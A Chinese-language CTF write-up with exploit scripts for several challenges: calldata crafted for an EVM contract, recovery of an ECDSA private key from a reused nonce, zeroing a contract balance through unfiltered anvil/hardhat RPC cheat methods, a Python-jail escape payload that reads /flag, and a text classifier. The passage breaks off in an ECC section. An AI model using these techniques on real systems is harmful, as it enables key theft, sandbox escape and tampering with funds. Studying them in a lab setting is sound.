![\"\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/figure>\n\n\n\n
\u5408\u7ea6\u9690\u85cf\u4e86\u4e24\u4e2a\u5165\u53e3\uff0c\u7b7e\u540d\u5206\u522b\u4e3a 0x5e36bdc6 \u548c 0xaab2fcd2\u3002\n\u5728 0x5e36bdc6 \u7684\u903b\u8f91\u5206\u652f\u4e2d\uff0c\u5b58\u5728 CALLDATASIZE \u6821\u9a8c\uff0c\u968f\u540e\u6709\u4e00\u6b65 PUSH1 0xff \u548c AND \u7684\u4f4d\u8fd0\u7b97\u3002\u8fd9\u8868\u660e\u8be5\u51fd\u6570\u9700\u8981\u4f20\u5165\u4e00\u4e2a uint8 \u7c7b\u578b\u7684\u53c2\u6570\uff08\u8303\u56f4 0-255\uff09\u3002\n\u5982\u679c\u4f20\u5165\u7684\u53c2\u6570\u4e0e Storage \u4e2d\u7684\u503c\u4e0d\u5339\u914d\uff0c\u7a0b\u5e8f\u4f1a\u8df3\u8f6c\u5e76\u629b\u51fa wrong \u9519\u8bef<\/code><\/pre>\n\n\n\n\u6838\u5fc3\u5206\u6790<\/p>\n\n\n\n
\u771f\u6b63\u7684\u72b6\u6001\u4fee\u6539\u901a\u5173\u51fd\u6570\u662f 0xaab2fcd2<\/code>\u3002 \u5206\u6790\u8be5\u51fd\u6570\u5bf9\u5e94\u7684 Opcodes\uff0c\u5173\u952e\u6307\u4ee4\u5305\u542b MUL<\/code>\uff08\u4e58\u6cd5\uff09\u3001DIV<\/code>\uff08\u9664\u6cd5\uff09\u3001EQ<\/code>\uff08\u76f8\u7b49\uff09\u3002\u5176\u5e95\u5c42\u6c47\u7f16\u903b\u8f91\u8fd8\u539f\u4e3a Solidity \u5982\u4e0b\uff1a<\/p>\n\n\n\nSolidity<\/p>\n\n\n\n
function solve(uint256 a, uint256 b, uint256 c) public {\n require(a * b == c, \"wrong\"); \n solved[msg.sender] = true; \n}<\/code><\/pre>\n\n\n\n\u903b\u8f91\u975e\u5e38\u7b80\u5355\uff1a\u63a5\u6536 3 \u4e2a uint256<\/code> \u53c2\u6570\uff0c\u82e5\u6ee1\u8db3 a * b == c<\/code> \u5373\u53ef\u7ed5\u8fc7 Require\uff0c\u5c06\u8c03\u7528\u8005\u7684\u5730\u5740\u8bb0\u5f55\u4e3a\u5df2\u901a\u5173\u3002<\/p>\n\n\n\n\u6f0f\u6d1e\u5229\u7528<\/p>\n\n\n\n
\u65e0\u9700\u7206\u7834\u6216\u731c\u6d4b\u590d\u6742\u53c2\u6570\uff0c\u76f4\u63a5\u4ee4\u53c2\u6570\u4e3a a = 1, b = 1, c = 1<\/code> \u6ee1\u8db3 1 * 1 = 1<\/code> \u7684\u6761\u4ef6\u5373\u53ef\u3002 \u6784\u9020 Calldata: 0xaab2fcd2<\/code> + 1<\/code>\u7684\u5341\u516d\u8fdb\u5236\uff08\u586b\u5145\u81f332\u5b57\u8282\uff09\u8fde\u7eed\u62fc\u63a5\u4e09\u6b21\u3002 \u53d1\u5305\u4e0a\u94fe\u540e\uff0c\u8bf7\u6c42\u540e\u7aef\u7684 \/api\/solve<\/code> \u63a5\u53e3\u9a8c\u8bc1\u72b6\u6001\u5373\u53ef\u62ff\u5230 flag\u3002<\/p>\n\n\n\nexp.py<\/p>\n\n\n\n
import requests\nfrom web3 import Web3\n\nBASE_URL = \"http:\/\/80-22d225ff-950e-4ade-944e-33c7f3c9f2fd.challenge.ctfplus.cn\"\nTARGET_ADDRESS = Web3.to_checksum_address(\"0x75537828f2ce51be7289709686A69CbFDbB714F1\")\nMY_ADDRESS = Web3.to_checksum_address(\"0x22b90354Da9A3ae22C28Cea132614C06Ff6E0fee\")\nPRIVATE_KEY = \"0x700e42cb88665acc02845a856b4d140e792f4b3d95841a9c6be403603a215cc9\"\n\nw3 = Web3(Web3.HTTPProvider(f\"{BASE_URL}\/rpc\"))\n\ndef exploit():\n func_selector = \"0xaab2fcd2\"\n arg = \"0000000000000000000000000000000000000000000000000000000000000001\"\n attack_data = func_selector + arg * 3\n\n tx = {\n 'nonce': w3.eth.get_transaction_count(MY_ADDRESS),\n 'to': TARGET_ADDRESS,\n 'value': 0,\n 'gas': 3000000,\n 'gasPrice': w3.eth.gas_price,\n 'data': attack_data,\n 'chainId': w3.eth.chain_id\n }\n\n signed_tx = w3.eth.account.sign_transaction(tx, private_key=PRIVATE_KEY)\n raw_tx = getattr(signed_tx, 'raw_transaction', getattr(signed_tx, 'rawTransaction', None))\n tx_hash = w3.eth.send_raw_transaction(raw_tx)\n w3.eth.wait_for_transaction_receipt(tx_hash)\n\nif __name__ == \"__main__\":\n exploit()\n res = requests.post(f\"{BASE_URL}\/api\/solve\", headers={'Content-Type': 'application\/json'})\n print(res.json().get('flag', 'Failed'))<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n
xmctf{ead1808f-fe56-4dd4-8bc0-63f1006c73e0}<\/code><\/pre>\n\n\n\n\u53e3\u7b97\u79c1\u94a5<\/h2>\n\n\n\n<\/div><\/figure>\n\n\n\n
<\/div><\/figure>\n\n\n\n
<\/div><\/figure>\n\n\n\n
\u89c2\u5bdf\u9898\u76ee\u7ed9\u51fa\u7684\u76ee\u6807\u5730\u5740\u5728 Sepolia \u6d4b\u8bd5\u7f51\u7684\u5386\u53f2\u4ea4\u6613\uff0c\u53d1\u73b0\u6709\u4e24\u7b14\u4ea4\u6613\u7684 ECDSA \u7b7e\u540d\u4e2d\uff0cr<\/code> \u503c\u5b8c\u5168\u76f8\u540c\u3002\u8fd9\u8868\u660e\u7b7e\u540d\u8005\u5728\u5bf9\u4e0d\u540c\u6570\u636e\u7b7e\u540d\u65f6\u4f7f\u7528\u4e86\u76f8\u540c\u7684\u968f\u673a\u6570 k\uff08Nonce \u91cd\u7528\uff09\u3002<\/p>\n\n\n\n\u8ba1\u7b97\u79c1\u94a5\uff1a \u5229\u7528 secp256k1 \u692d\u5706\u66f2\u7ebf\u7684\u6570\u5b66\u7f3a\u9677\uff0c\u63d0\u53d6\u8fd9\u4e24\u7b14\u4ea4\u6613\u7684 r, s1, s2 \u503c\uff0c\u5e76\u91cd\u6784\u539f\u59cb\u672a\u7b7e\u540d\u4ea4\u6613\u8ba1\u7b97\u51fa\u54c8\u5e0c z1, z2\u3002 \u5957\u7528\u516c\u5f0f\u6c42\u51fa\u79c1\u94a5 d\uff1a
$$
k = (z_1 – z_2) \/ (s_1 – s_2) pmod{n}
$$<\/p>\n\n\n\n
$$
d = (s_1 cdot k – z_1) \/ r pmod{n}
$$<\/p>\n\n\n\n
\u7b97\u51fa\u76ee\u6807\u5730\u5740\u79c1\u94a5\u4e3a\uff1a<\/p>\n\n\n\n
0xf149f149f149f149f149f149f149f149f149f149f149f149f149f149f149f149<\/code><\/pre>\n\n\n\n\u94fe\u4e0a\u4ea4\u4e92\uff1a \u5c06\u73af\u5883\u5207\u6362\u5230\u9898\u76ee\u63d0\u4f9b\u7684\u672c\u5730 RPC\uff0c\u4f7f\u7528\u7b97\u51fa\u7684\u79c1\u94a5\u8c03\u7528\u76ee\u6807\u5408\u7ea6 0x755378...<\/code> \u7684 solve()<\/code> \u65b9\u6cd5\uff0c\u5c06 isSolve<\/code> \u72b6\u6001\u7f6e\u4e3a true<\/code>\u3002\u4ea4\u6613\u6253\u5305\u786e\u8ba4\u540e\uff0c\u70b9\u51fb Check \u5373\u53ef\u62ff\u5230 flag\u3002<\/p>\n\n\n\nexp.py<\/p>\n\n\n\n
from web3 import Web3\nfrom eth_account import Account\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n\nRPC_SEPOLIA = \"https:\/\/ethereum-sepolia-rpc.publicnode.com\" \nRPC_CTF = \"http:\/\/80-bcef2609-4364-40c8-897f-ffaf777f2f87.challenge.ctfplus.cn\/rpc\" \n\nw3_sepolia = Web3(Web3.HTTPProvider(RPC_SEPOLIA))\nw3_ctf = Web3(Web3.HTTPProvider(RPC_CTF))\n\nTARGET_CONTRACT = \"0x75537828f2ce51be7289709686A69CbFDbB714F1\"\nTX_HASH_1 = \"0x1bdc4cc1939e6b045e6dd6e306ce47c72cbb216e5ae94db32b789961d6369b0b\"\nTX_HASH_2 = \"0x724331da3fb30695b44340df454cca06ddd296f86d1eb250af86a800029ff380\"\nTARGET_ADDRESS = \"0x1862fB125eEc7b36E0797b4F8F55Dfb099F08934\"\nN = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141\n\ndef get_transaction_z(tx_dict):\n tx_type = tx_dict.get('type', 0)\n\n if tx_type == 2:\n from eth_account._utils.typed_transactions import TypedTransaction\n unsigned_dict = {\n 'chainId': tx_dict['chainId'],\n 'nonce': tx_dict['nonce'],\n 'maxPriorityFeePerGas': tx_dict['maxPriorityFeePerGas'],\n 'maxFeePerGas': tx_dict['maxFeePerGas'],\n 'gas': tx_dict['gas'],\n 'to': tx_dict['to'] if tx_dict.get('to') else b'',\n 'value': tx_dict['value'],\n 'data': tx_dict['input'],\n 'accessList': tx_dict.get('accessList', []),\n }\n typed_tx = TypedTransaction(transaction_type=2, dictionary=unsigned_dict)\n return int.from_bytes(typed_tx.hash(), byteorder='big')\n else:\n from eth_account._utils.legacy_transactions import serializable_unsigned_transaction_from_dict\n unsigned_dict = {\n 'nonce': tx_dict['nonce'],\n 'gasPrice': tx_dict['gasPrice'],\n 'gas': tx_dict['gas'],\n 'to': tx_dict['to'] if tx_dict.get('to') else b'',\n 'value': tx_dict['value'],\n 'data': tx_dict['input'],\n }\n if 'chainId' in tx_dict and tx_dict['chainId'] is not None:\n unsigned_dict['chainId'] = tx_dict['chainId']\n unsigned_tx = serializable_unsigned_transaction_from_dict(unsigned_dict)\n return int.from_bytes(unsigned_tx.hash(), byteorder='big')\n\ndef mod_inverse(a, m):\n return pow(a, -1, m)\n\ntx1 = w3_sepolia.eth.get_transaction(TX_HASH_1)\ntx2 = w3_sepolia.eth.get_transaction(TX_HASH_2)\n\nr1 = int.from_bytes(tx1['r'], byteorder='big')\nr2 = int.from_bytes(tx2['r'], byteorder='big')\ns1 = int.from_bytes(tx1['s'], byteorder='big')\ns2 = int.from_bytes(tx2['s'], byteorder='big')\n\nz1 = get_transaction_z(tx1)\nz2 = get_transaction_z(tx2)\n\nk = ((z1 - z2) * mod_inverse(s1 - s2, N)) % N\nd = ((s1 * k - z1) * mod_inverse(r1, N)) % N\n\nhacked_private_key = hex(d)\nhacked_account = Account.from_key(hacked_private_key)\n\nif hacked_account.address.lower() != TARGET_ADDRESS.lower():\n s1_neg = N - s1\n k_neg = ((z1 - z2) * mod_inverse(s1_neg - s2, N)) % N\n d_neg = ((s1_neg * k_neg - z1) * mod_inverse(r1, N)) % N\n hacked_private_key = hex(d_neg)\n hacked_account = Account.from_key(hacked_private_key)\n\nabi = [{\"inputs\":[],\"name\":\"solve\",\"outputs\":[],\"stateMutability\":\"nonpayable\",\"type\":\"function\"}]\ncontract = w3_ctf.eth.contract(address=TARGET_CONTRACT, abi=abi)\n\nnonce = w3_ctf.eth.get_transaction_count(hacked_account.address)\n\ntx = contract.functions.solve().build_transaction({\n 'chainId': w3_ctf.eth.chain_id,\n 'gas': 100000,\n 'gasPrice': w3_ctf.eth.gas_price,\n 'nonce': nonce,\n})\n\nsigned_tx = w3_ctf.eth.account.sign_transaction(tx, private_key=hacked_private_key)\ntx_hash = w3_ctf.eth.send_raw_transaction(signed_tx.raw_transaction)\n\nw3_ctf.eth.wait_for_transaction_receipt(tx_hash)<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n
xmctf(97966753-507f-4c72-a131-a83f50fede9e)<\/code><\/pre>\n\n\n\nWrapped Ether<\/h2>\n\n\n\n<\/div><\/figure>\n\n\n\n
<\/div><\/figure>\n\n\n\n
\u5ba1\u67e5\u9875\u9762\u63d0\u4f9b\u7684 WrappedEther.sol \u6e90\u7801\uff0c\u53d1\u73b0 withdrawAll() \u51fd\u6570\u5728\u66f4\u65b0\u4f59\u989d\uff08balanceOf[msg.sender] = 0\uff09\u4e4b\u524d\u5148\u6267\u884c\u4e86\u8f6c\u8d26\uff08sendEth\uff09\uff0c\u6709\u91cd\u5165\u6f0f\u6d1e\u3002<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u4f46\u662f\uff0c\u5408\u7ea6\u4e2d\u5b58\u5728 checkChallenger \u4fee\u9970\u5668\uff0c\u4e25\u683c\u9650\u5236\u4e86\u8c03\u7528\u8005 msg.sender \u5fc5\u987b\u662f\u5e73\u53f0\u5206\u914d\u7684 EOA\uff08\u5916\u90e8\u62e5\u6709\u8d26\u6237\uff09\u5730\u5740\u3002EOA \u8d26\u6237\u6ca1\u6709\u4ee3\u7801\uff0c\u65e0\u6cd5\u5728\u63a5\u6536\u5230\u4ee5\u592a\u574a\u65f6\u89e6\u53d1 fallback \u6216 receive \u8fdb\u884c\u4e8c\u6b21\u8c03\u7528\u3002\u56e0\u6b64\uff0c\u91cd\u5165\u5e94\u8be5\u4e00\u5047\u7684\uff0c\u5e38\u89c4\u7684\u94fe\u4e0a\u5408\u7ea6\u653b\u51fb\u65e0\u6cd5\u751f\u6548\u3002<\/code><\/pre>\n\n\n\n\u6f0f\u6d1e<\/p>\n\n\n\n
\u9898\u76ee\u76f4\u63a5\u66b4\u9732\u4e86 \/rpc \u63a5\u53e3\uff0c\u5e95\u5c42\u73af\u5883\u901a\u5e38\u7531 Foundry (Anvil) \u6216 Hardhat \u9a71\u52a8\u3002\u51fa\u9898\u4eba\u5982\u679c\u6ca1\u6709\u5bf9 RPC \u65b9\u6cd5\u8fdb\u884c\u4e25\u683c\u7684\u767d\u540d\u5355\u8fc7\u6ee4\uff0c\u6d4b\u8bd5\u7f51\u9ed8\u8ba4\u4f1a\u5f00\u7684 Cheat Codes\u3002<\/code><\/pre>\n\n\n\n\u5229\u7528<\/p>\n\n\n\n
\u5229\u7528\u601d\u8def\uff1a\u76f4\u63a5\u8df3\u8fc7\u5408\u7ea6\u903b\u8f91\uff0c\u901a\u8fc7 HTTP POST \u8bf7\u6c42\u5411 RPC \u53d1\u9001 anvil_setBalance \u6216 hardhat_setBalance \u65b9\u6cd5\uff0c\u5c06\u76ee\u6807 WETH \u5408\u7ea6\u7684\u4f59\u989d\u5f3a\u5236\u7be1\u6539\u4e3a 0\uff0c\u4ece\u800c\u76f4\u63a5\u6ee1\u8db3 Setup.sol \u4e2d isSolved() \u7684\u901a\u5173\u6761\u4ef6\u3002<\/code><\/pre>\n\n\n\nexp.py<\/p>\n\n\n\n
import requests\nfrom web3 import Web3\nimport time\n\nBASE_URL = \"http:\/\/80-567f608a-3866-446e-b286-0048279b3dcf.challenge.ctfplus.cn\"\nRPC_URL = f\"{BASE_URL}\/rpc\"\nAPI_URL = f\"{BASE_URL}\/api\/solve\"\nTARGET_WETH = \"0xCafac3dD18aC6c6e92c921884f9E4176737C052c\"\n\nw3 = Web3(Web3.HTTPProvider(RPC_URL))\n\npayload_anvil = {\n \"jsonrpc\": \"2.0\",\n \"method\": \"anvil_setBalance\",\n \"params\": [TARGET_WETH, \"0x0\"],\n \"id\": 1\n}\n\npayload_hardhat = {\n \"jsonrpc\": \"2.0\",\n \"method\": \"hardhat_setBalance\",\n \"params\": [TARGET_WETH, \"0x0\"],\n \"id\": 2\n}\n\ntry:\n requests.post(RPC_URL, json=payload_anvil)\nexcept:\n pass\n\ntry:\n requests.post(RPC_URL, json=payload_hardhat)\nexcept:\n pass\n\ntime.sleep(1)\n\nif w3.eth.get_balance(TARGET_WETH) == 0:\n response = requests.post(API_URL, headers={'Content-Type': 'application\/json'})\n print(response.json().get('flag'))<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n
xmctf{81e9c88d-05ce-48be-8359-dcfa5e77a0fa}<\/code><\/pre>\n\n\n\nModelMark<\/h2>\n\n\n\n<\/div><\/figure>\n\n\n\n
<\/div><\/figure>\n\n\n\n
\u670d\u52a1\u7aef\u4f1a\u968f\u673a\u751f\u6210\u4e00\u4e2a\u524d\u7f00\uff08\u4f8b\u5982 58B3v9\uff09\uff0c\u8981\u6c42\u4f60\u63d0\u4ea4\u4e00\u4e2a\u5b57\u7b26\u4e32 x\uff0c\u4f7f\u5f97 \u524d\u7f00 + x \u7684 SHA256 \u54c8\u5e0c\u503c\u4ee5\u6307\u5b9a\u7684\u5b57\u7b26\uff08\u5982 0000\uff09\u5f00\u5934\uff0c \u89e3\u51fa\u8fd8\u6709\u7b2c\u4e8c\u5173<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
\u8003\u70b9<\/p>\n\n\n\n
PoW \u9a8c\u8bc1\u7ed5\u8fc7\uff1a\u901a\u8fc7 SHA256 \u54c8\u5e0c\u7206\u7834\u6ee1\u8db3\u6307\u5b9a\u524d\u7f00,\u6587\u672c\u5206\u7c7b\/\u673a\u5668\u5b66\u4e60<\/p>\n\n\n\n
\u5229\u7528\u7ed9\u5b9a\u7684 dataset_train.json \u8fdb\u884c\u6a21\u578b\u5f52\u5c5e\u9884\u6d4b\u3002\u7531\u4e8e\u670d\u52a1\u7aef\u4e0b\u53d1\u7684\u6570\u636e\u4f1a\u5e26\u6709 <think> \u6807\u7b7e\u6216\u6392\u7248\u53d8\u52a8\uff0c\u5355\u7eaf\u7684\u54c8\u5e0c\u6216\u7b49\u503c\u5339\u914d\u4f1a\u5931\u6548\uff0c\u9700\u8981\u63d0\u53d6\u5b57\u7b26\u7ea7\u7279\u5f81\u5e76\u4f7f\u7528 SVM \u8fdb\u884c\u5206\u7c7b\u8bc6\u522b\u3002<\/code><\/pre>\n\n\n\n\u89e3\u9898\u601d\u8def<\/p>\n\n\n\n
\u8fde\u63a5\u4e0e PoW\uff1anc \u8fde\u4e0a\u540e\uff0c\u63d0\u53d6\u524d\u7f00\uff0c\u672c\u5730\u5faa\u73af\u8ba1\u7b97 sha256(prefix + x)\uff0c\u6ee1\u8db3\u6761\u4ef6\u540e\u63d0\u4ea4 x\u3002\n\n\u6570\u636e\u9884\u5904\u7406\u4e0e\u6a21\u578b\u8bad\u7ec3\uff1a\n\u8bfb\u53d6\u672c\u5730 JSON \u6570\u636e\u96c6\u3002\n\u6784\u5efa\u4e00\u4e2a\u7eaf\u6587\u672c\u5b57\u5178\uff08\u53bb\u9664\u6240\u6709\u7a7a\u683c\u3001\u6362\u884c\uff09\uff0c\u7528\u4e8e\u7cbe\u51c6\u5339\u914d\u539f\u9898\uff0c\u4fdd\u8bc1 100% \u51c6\u786e\u7387\u3002\n\u6784\u5efa\u4e00\u4e2a\u673a\u5668\u5b66\u4e60\u5206\u7c7b\u5668\uff08TF-IDF + LinearSVC\uff09\u3002\u63d0\u53d6 3-5 \u4e2a\u5b57\u7b26\u957f\u5ea6\u7684\u7279\u5f81\uff08\u80fd\u7cbe\u51c6\u6355\u6349\u5927\u6a21\u578b\u7279\u6709\u7684 <\/think> \u6807\u7b7e\u6216\u6392\u7248\u4e60\u60ef\uff09\uff0c\u4f7f\u7528\u5b8c\u6574\u6570\u636e\u96c6\u8fdb\u884c\u8bad\u7ec3\uff0c\u7528\u4e8e\u515c\u5e95\u9884\u6d4b\u670d\u52a1\u7aef\u52a8\u6001\u751f\u6210\u7684\u53d8\u79cd\u56de\u7b54\u3002\n\u81ea\u52a8\u7b54\u9898\u903b\u8f91\uff1a\u901a\u8fc7\u6b63\u5219\u63d0\u53d6\u670d\u52a1\u7aef\u7684 Answer \u548c\u9009\u9879\u5217\u8868\u3002\u5148\u67e5\u5b57\u5178\uff0c\u67e5\u4e0d\u5230\u5219\u8d70 SVM \u9884\u6d4b\uff0c\u5c06\u9884\u6d4b\u7ed3\u679c\u5bf9\u5e94\u7684\u6570\u5b57\u9009\u9879\u53d1\u56de\u670d\u52a1\u7aef\u3002\u5916\u5c42\u5957\u4e00\u4e2a while True\uff0c\u5373\u4fbf\u4e2d\u9014\u9884\u6d4b\u9519\u65ad\u5f00\u8fde\u80dc\uff0c\u4e5f\u4f1a\u81ea\u52a8\u91cd\u8bd5\uff0c\u76f4\u5230\u8fde\u7eed\u7b54\u5bf9 8 \u9898\u5237\u51fa flag\u3002<\/code><\/pre>\n\n\n\nexp.py<\/p>\n\n\n\n
import json\nimport hashlib\nimport re\nimport sys\nfrom pwn import *\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.svm import LinearSVC\nfrom sklearn.pipeline import make_pipeline\n\ndef solve_pow(prefix, target=\"0000\"):\n for i in range(10000000):\n x = str(i)\n if hashlib.sha256((prefix + x).encode()).hexdigest().startswith(target):\n return x\n return None\n\ndef normalize(text):\n return re.sub(r's+', '', text)\n\ndef train_hybrid_model(filepath):\n with open(filepath, 'r', encoding='utf-8') as f:\n data = json.load(f)\n\n exact_match_db = {}\n X = []\n y = []\n\n for item in data:\n ans = item['answer']\n mod = item['model']\n exact_match_db[normalize(ans)] = mod\n X.append(ans)\n y.append(mod)\n\n clf = make_pipeline(TfidfVectorizer(analyzer='char', ngram_range=(3, 5)), LinearSVC(C=1.0))\n clf.fit(X, y)\n\n return exact_match_db, clf\n\ndef main():\n host = 'nc1.ctfplus.cn'\n port = 21819\n dataset_file = 'dataset_train.json'\n\n exact_match_db, classifier = train_hybrid_model(dataset_file)\n\n r = remote(host, port)\n r.recvuntil(b\"sha256(\")\n prefix = r.recvuntil(b\" + x)\", drop=True).decode()\n r.recvuntil(b\"starts with \")\n target = r.recvline().strip().decode()\n\n x = solve_pow(prefix, target)\n r.recvuntil(b\"x = \")\n r.sendline(x.encode())\n\n buffer = \"\"\n while True:\n try:\n chunk = r.recv(1024).decode('utf-8', errors='ignore')\n if not chunk:\n break\n buffer += chunk\n sys.stdout.write(chunk)\n sys.stdout.flush()\n\n if \"xmctf{\" in buffer.lower() or \"flag{\" in buffer.lower():\n break\n\n if \"> \" in buffer and \"Which model?\" in buffer:\n ans_match = re.search(r'Answer:s*(.*?)s*Which model?', buffer, re.DOTALL)\n if ans_match:\n answer_raw = ans_match.group(1).strip()\n\n options = {}\n for line in buffer.split('n'):\n line = line.strip()\n if ')' in line and ' ' in line:\n parts = line.split(')', 1)\n if len(parts) == 2 and parts[0].isdigit():\n options[parts[1].strip()] = parts[0].strip()\n\n ans_norm = normalize(answer_raw)\n if ans_norm in exact_match_db:\n predicted_model = exact_match_db[ans_norm]\n else:\n predicted_model = classifier.predict([answer_raw])[0]\n\n choice_num = options.get(predicted_model)\n if choice_num:\n r.sendline(choice_num.encode())\n else:\n r.sendline(b\"1\")\n buffer = \"\"\n except Exception:\n break\n\nif __name__ == \"__main__\":\n main()<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n
xmctf{fb30c811-f64a-4543-a4da-8f8d2bd336d4}<\/code><\/pre>\n\n\n\nez_pyjail<\/h2>\n\n\n\n
\u4e0d\u50cfMisc \u8fd9\u4e0d\u5c31\u662fWeb\u5417\uff1f<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n
<\/div><\/figure>\n\n\n\n
\u4ee3\u7801\uff1a<\/p>\n\n\n\n
assert ascii(x)[1:-1] != x.replace(\"__\",\"\")[:105], run_jail(x)\neval(x, {'__builtins__':{}}, {'__builtins__':{}})\n\n\u89e6\u53d1\u6267\u884c\uff1a\u5fc5\u987b\u8ba9 assert \u65ad\u8a00\u5931\u8d25\uff08\u5de6\u53f3\u4e24\u8fb9\u76f8\u7b49\uff09\u624d\u80fd\u6267\u884c\u540e\u534a\u622a\u7684 run_jail\u3002\n\u9650\u5236\u6761\u4ef6\uff1a\npayload \u957f\u5ea6\u4e0d\u80fd\u8d85\u8fc7 105\u3002\n\u4e0d\u80fd\u5305\u542b\u53cc\u4e0b\u5212\u7ebf __\u3002\n\u53ea\u80fd\u5305\u542b\u7eaf ASCII \u5b57\u7b26\u4e14\u5355\u53cc\u5f15\u53f7\u4e0d\u80fd\u6df7\u7528\uff08\u9632\u6b62 ascii() \u8f6c\u4e49\u5bfc\u81f4\u957f\u5ea6\/\u5185\u5bb9\u4e0d\u4e00\u81f4\uff09\u3002\n\u6c99\u7bb1\u73af\u5883\uff1aeval \u7684 globals \u548c locals \u7f6e\u7a7a\uff0c\u65e0 __builtins__\u3002<\/code><\/pre>\n\n\n\n\u9003\u9038\u601d\u8def<\/p>\n\n\n\n
\u6062\u590d builtins\uff1a\u5229\u7528\u751f\u6210\u5668\u5bf9\u8c61\u7684\u5e27\u6808 gi_frame.f_back.f_back.f_builtins \u8df3\u51fa\u53d7\u9650\u4f5c\u7528\u57df\uff0c\u62ff\u5230\u539f\u751f builtins\u3002\n\u89c4\u907f Python 3.11+ \u5e27\u4f18\u5316\uff1a\u5728 3.11+ \u4e2d\uff0c\u672a\u8fd0\u884c\u7684\u751f\u6210\u5668 f_back \u4e3a None\u3002\u6784\u9020\u81ea\u8fed\u4ee3\u751f\u6210\u5668 (l:=[]).append(... for i in l)\uff0c\u8ba9\u751f\u6210\u5668\u5728\u8fd0\u884c\u7684\u77ac\u95f4\u6293\u53d6\u81ea\u8eab\u7684\u5e27\u3002\n\n\u65e0\u5185\u7f6e\u51fd\u6570\u89e6\u53d1\u6267\u884c\uff1a\u6c99\u7bb1\u5185\u65e0 next \u6216 list \u51fd\u6570\u3002\u5229\u7528\u661f\u53f7\u89e3\u5305 [*...] \u5f3a\u5236\u5c55\u5f00\u751f\u6210\u5668\u89e6\u53d1\u4ee3\u7801\u6267\u884c\u3002\n\u62a5\u9519\u5e26\u51fa\uff08\u56de\u663e\u76f2\u6ce8\uff09\uff1arun_jail \u65e0\u8f93\u51fa\u3002\u5229\u7528\u5b57\u5178\u952e\u9519\u8bef {}[payload]\uff0c\u5c06\u8bfb\u51fa\u7684 flag \u4f5c\u4e3a\u4e0d\u5b58\u5728\u7684\u952e\u540d\uff0c\u89e6\u53d1 KeyError \u628a flag \u629b\u5230 stderr\u3002<\/code><\/pre>\n\n\n\nPayload<\/p>\n\n\n\n
\u6781\u9650\u538b\u7f29\uff0c\u6700\u7ec8\u8bfb\u53d6 \/flag \u7684 payload \u957f\u5ea6\u4e3a 104\uff08\u6ee1\u8db3 <=105\uff09<\/p>\n\n\n\n
{}[[*((l:=[]).append(i.gi_frame.f_back.f_back.f_builtins['open']('\/flag').read()for i in l)or l[0])][0]]<\/code><\/pre>\n\n\n\n\u81ea\u52a8\u4ea4\u4e92exp<\/p>\n\n\n\n
from pwn import *\n\ndef pwn():\n host = 'nc1.ctfplus.cn'\n port = 35140\n io = remote(host, port)\n io.recvuntil(b\"payload:\")\n\n payload = \"{}[[*((l:=[]).append(i.gi_frame.f_back.f_back.f_builtins['open']('\/flag').read()for i in l)or l[0])][0]]\"\n io.sendline(payload.encode())\n\n try:\n res = io.recvall(timeout=3).decode('utf-8', errors='ignore')\n print(res.strip())\n except:\n pass\n finally:\n io.close()\n\nif __name__ == '__main__':\n pwn()<\/code><\/pre>\n\n\n\n<\/div><\/figure>\n\n\n\n
xmctf{29f349b9-a1b8-44b5-abcd-97ef37cf4c5f}<\/code><\/pre>\n\n\n\n\u95ee\u5377\u6536\u96c6<\/h2>\n\n\n\n<\/div><\/figure>\n\n\n\n
<\/div><\/figure>\n\n\n\n
PolarisCTF{Y0u_4r3_th3_n3xt_P0lar1s_St4r}<\/code><\/pre>\n\n\n\nCrypto<\/h1>\n\n\n\nECC<\/h2>\n\n\n\n<\/div><\/figure>\n\n\n\n
<\/div><\/figure>\n\n\n\n
\u5947\u5f02\u692d\u5706\u66f2\u7ebf \u5c16\u70b9 \u964d\u9636\u540c\u6784<\/p>\n\n\n\n
\u9898\u76ee\u7ed9\u5b9a\u7684\u692d\u5706\u66f2\u7ebf\u52a0\u6cd5\u548c\u500d\u70b9\u516c\u5f0f\u4e2d a=0\uff0c\u5bf9\u5e94\u66f2\u7ebf\u65b9\u7a0b\u4e3a\uff1a
$$
y^2 + cy equiv x^3 + bx^2 + dx + e pmod p
$$<\/p>\n\n\n\n
$$
\u5bf9\u5de6\u4fa7\u8fdb\u884c\u914d\u65b9\uff0c\u4ee4 Y = y + frac{c}{2} pmod p\uff0c\u65b9\u7a0b\u8f6c\u5316\u4e3a\u77ed Weierstrass \u5f62\u5f0f\uff1a
$$<\/p>\n\n\n\n
$$
Y^2 equiv x^3 + bx^2 + dx + (e + frac{c^2}{4}) pmod p
$$<\/p>\n\n\n\n
\u68c0\u67e5\u53f3\u4fa7\u591a\u9879\u5f0f f(x)\u3002\u5982\u679c\u5b83\u5b58\u5728\u4e09\u91cd\u6839 r
$$
\u5373 f(x) = (x-r)^3
$$
\u5219\u8be5\u66f2\u7ebf\u4e3a\u5e26\u5c16\u70b9\u7684\u5947\u5f02\u66f2\u7ebf\u3002\u6839\u636e
$$
(x-r)^3 = x^3 – 3rx^2 + 3r^2x – r^3
$$
\u53ef\u4ee5\u76f4\u63a5\u6c42\u51fa\u6839
$$
r equiv -b cdot 3^{-1} pmod p
$$
\u5bf9\u4e8e\u5e26\u5c16\u70b9\u7684\u5947\u5f02\u66f2\u7ebf\uff0c\u7531\u4e8e\u5176\u975e\u5947\u5f02\u70b9\u7fa4\u540c\u6784\u4e8e\u6709\u9650\u57df\u7684\u52a0\u6cd5\u7fa4
$$
(mathbb{F}_p, +)
$$
\u5e38\u89c4\u7684 ECDLP \u88ab\u5f7b\u5e95\u7834\u574f\u3002\u540c\u6784\u6620\u5c04\u6620\u5c04\u516c\u5f0f\u4e3a\uff1a
$$
